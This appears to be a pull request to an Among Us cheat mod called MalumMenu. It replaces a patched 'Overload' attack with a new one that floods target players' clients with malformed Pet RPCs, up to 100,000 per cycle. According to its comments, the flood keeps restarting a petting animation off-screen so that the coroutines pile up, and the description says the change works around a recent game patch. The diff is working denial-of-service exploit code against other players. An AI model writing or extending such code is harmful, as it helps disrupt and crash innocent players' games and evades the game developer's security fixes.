### PR TITLE
Replace old Overload technique with a working new one

### DIFF
--- a/src/MalumMenu.cs
+++ b/src/MalumMenu.cs
@@ -124,10 +124,10 @@ public partial class MalumMenu : BasePlugin
 
         adaptMaxStrength = Config.Bind("MalumMenu.Overload",
                                 "AdaptMaxStrength",
-                                5000,
+                                18000,
                                 new ConfigDescription(
-                                    "Maximum total number of RPCs sent during one overload cycle in AutoAdapt mode. Automatically divided between targets and reduced based on ping. IMPORTANT: Only goes from 1 to 1000 RPCs",
-                                    new AcceptableValueRange<int>(1, 10000)
+                                    "Maximum total number of RPCs sent during one overload cycle in AutoAdapt mode. Automatically divided between targets and reduced based on ping. IMPORTANT: Only goes from 1 to 100K RPCs",
+                                    new AcceptableValueRange<int>(1, 100000)
                                 ));
 
         adaptMaxCooldown = Config.Bind("MalumMenu.Overload",
@@ -145,10 +145,10 @@ public partial class MalumMenu : BasePlugin
 
         defaultStrength = Config.Bind("MalumMenu.Overload",
                                 "DefaultStrength",
-                                5000,
+                                18000,
                                 new ConfigDescription(
-                                    "Default number of malformed RPCs sent to each target during an overload cycle. Overridden if AutoAdapt mode is enabled. IMPORTANT: Only goes from 1 to 1000 RPCs",
-                                    new AcceptableValueRange<int>(1, 10000)
+                                    "Default number of malformed RPCs sent to each target during an overload cycle. Overridden if AutoAdapt mode is enabled. IMPORTANT: Only goes from 1 to 100K RPCs",
+                                    new AcceptableValueRange<int>(1, 100000)
                                 ));
 
         defaultCooldown = Config.Bind("MalumMenu.Overload",

--- a/src/UI/Windows/MenuUI.cs
+++ b/src/UI/Windows/MenuUI.cs
@@ -126,7 +126,6 @@ public class MenuUI : MonoBehaviour
             if (CheatToggles.runOverload)
             {
                 OverloadUI.StopOverload();
-                OverloadHandler.ClearCustomTargets();
             }
         }
 

--- a/src/UI/Windows/OverloadUI.cs
+++ b/src/UI/Windows/OverloadUI.cs
@@ -80,11 +80,11 @@ public class OverloadUI : MonoBehaviour
             }
         }
 
-        // The HashSet swap (currentTargets <-> _tmpTargets) can only be done if AmClient
-        // Otherwise currentTargets gets cleared too early during disconnect with overload on,
+        // The HashSet swap (currentTargets <-> _tmpTargets) can only be done if isPlayer
+        // Otherwise currentTargets gets cleared too early in endgame / disconnect with overload on,
         // causing the STOP message to log the wrong total count
 
-        if (Utils.isClient && AmongUsClient.Instance.AmClient)
+        if (Utils.isPlayer)
         {
             var old = currentTargets;
             currentTargets = _tmpTargets;
@@ -92,9 +92,13 @@ public class OverloadUI : MonoBehaviour
         }
         else
         {
-            // currentTargets is cleared here if STOP log is done / unneeded (overload off)
+            // Targets are cleared here if STOP log is done / unneeded (overload off)
 
-            if (!CheatToggles.runOverload) currentTargets.Clear();
+            if (!CheatToggles.runOverload)
+            {
+                currentTargets.Clear();
+                OverloadHandler.ClearCustomTargets();
+            }
 
             _hasAutoStarted = false;
         }

--- a/src/UI/Windows/Tabs/OverloadTab.cs
+++ b/src/UI/Windows/Tabs/OverloadTab.cs
@@ -8,7 +8,7 @@ public class OverloadTab : ITab
     public string name => "Overload";
 
     private GUIStyle _sliderSubtitle;
-    private int _maxStrength = 10000;
+    private int _maxStrength = 100000;
     private float _maxCooldown = 1f;
     private float _fpsEstimate = 0f;
     private float _rawCooldown;
@@ -253,11 +253,11 @@ public class OverloadTab : ITab
 
         if (isPressedMaxStrength)
         {
-            if (_maxStrength >= 10000) // Max _maxStrength = 10000 RPCs
+            if (_maxStrength >= 100000) // Max _maxStrength = 100K RPCs
             {
                 CheatToggles.olAutoAdapt = false; // Disable AutoAdapt if user does manual input
 
-                OverloadHandler.strength = Mathf.RoundToInt(OverloadHandler.strength/100f); // Adjust value to account for max change (÷10)
+                OverloadHandler.strength = Mathf.RoundToInt(OverloadHandler.strength/1000f); // Adjust value to account for max change (÷1000)
 
                 _maxStrength = 100; // Min _maxStrength = 100 RPCs
             }

--- a/src/UI/Windows/Tabs/OverloadTab.cs
+++ b/src/UI/Windows/Tabs/OverloadTab.cs
@@ -191,6 +191,7 @@ public class OverloadTab : ITab
     private void DrawSettingsSliders()
     {
         GUILayout.Label($"Strength : {_rawStrength}", _sliderSubtitle);
+
         GUILayout.Space(1);
 
         GUILayout.BeginHorizontal();
@@ -204,13 +205,16 @@ public class OverloadTab : ITab
         }
 
         GUILayout.Space(5);
-        bool isPressedMaxStrength = GUILayout.Button($"{_maxStrength}", GUILayout.Width(51f));
+
+        string maxStrengthStr = _maxStrength % 1000 == 0 ? $"{_maxStrength / 1000}K" : $"{_maxStrength}";
+        bool isPressedMaxStrength = GUILayout.Button(maxStrengthStr, GUILayout.Width(51f));
 
         GUILayout.EndHorizontal();
 
         GUILayout.Space(10);
 
         GUILayout.Label($"Cooldown : {_rawCooldown:F2}", _sliderSubtitle);
+
         GUILayout.Space(1);
 
         GUILayout.BeginHorizontal();
@@ -224,6 +228,7 @@ public class OverloadTab : ITab
         }
 
         GUILayout.Space(5);
+
         bool isPressedMaxCooldown = GUILayout.Button($"{_maxCooldown:F0}", GUILayout.Width(51f));
 
         GUILayout.EndHorizontal();

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -323,7 +323,7 @@ public static class Utils
 
                 messageWriter.Write((ushort)0);
 
-		        messageWriter.Write((ushort)0);
+                messageWriter.Write((ushort)0);
 
                 messageWriter.EndMessage();
             }

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -275,20 +275,17 @@ public static class Utils
         return 10 + num;
     }
 
-    // Overloads target with set strength using malformed RPCs
+    // Overloads target with set strength using Pet RPCs that
+    // repeatedly restart the hand-petting animation, preventing old petting coroutines
+    // from resolving
     public static void Overload(int targetId, int strength)
     {
         if (strength < 1) return;
 
         int maxRpc = GetMaxRpcPackingLimit();
 
-        // ClimbLadder RPC is only effective in maps with no ladders or in lobby
-        // SetStartCounter RPC is only effective when NOT in lobby
-
-        bool hasLadders = isShip && (isFungleMap || isAirshipMap);
-
-        uint netId = hasLadders ? PlayerControl.LocalPlayer.NetId : PlayerControl.LocalPlayer.MyPhysics.NetId;
-        byte rpcCall = hasLadders ? (byte)RpcCalls.SetStartCounter : (byte)RpcCalls.ClimbLadder;
+        uint netId = PlayerControl.LocalPlayer.MyPhysics.NetId;
+        byte rpcCall = (byte)RpcCalls.Pet;
 
         if (strength <= maxRpc)
         {
@@ -311,8 +308,23 @@ public static class Utils
             for (var msg = 0; msg < strength; msg++)
             {
                 messageWriter.StartMessage((byte)GameDataTypes.RpcFlag);
+
                 messageWriter.WritePacked(netId);
+
                 messageWriter.Write(rpcCall);
+
+                // Use LocalPlayer.GetTruePosition() as the petting position
+                // to minimize WalkPlayerTo delay and start the hand-petting animation immediately
+
+                NetHelpers.WriteVector2(PlayerControl.LocalPlayer.GetTruePosition(), messageWriter);
+
+                // Pet position is decoded as (-50, -50) on target clients
+                // This keeps the hand-petting animation out of normal view
+
+                messageWriter.Write((ushort)0);
+
+		        messageWriter.Write((ushort)0);
+
                 messageWriter.EndMessage();
             }
 


### PR DESCRIPTION
- **Fix**: Replace old Overload technique with a new one
  - This replacement is necessary as the old technique was recently patched and cannot be used anymore
- **Fix**: Fix an issue that caused custom targets to not clear properly on disconnect
- **Feat**: Increase max strength cap from 10K to 100K
  - Also increase all default strength values from 5K to 18K
  - This is necessary as the new overload technique is not as strong as the previous one
- **Feat**: Use compact numbers for maxStrength button label in UI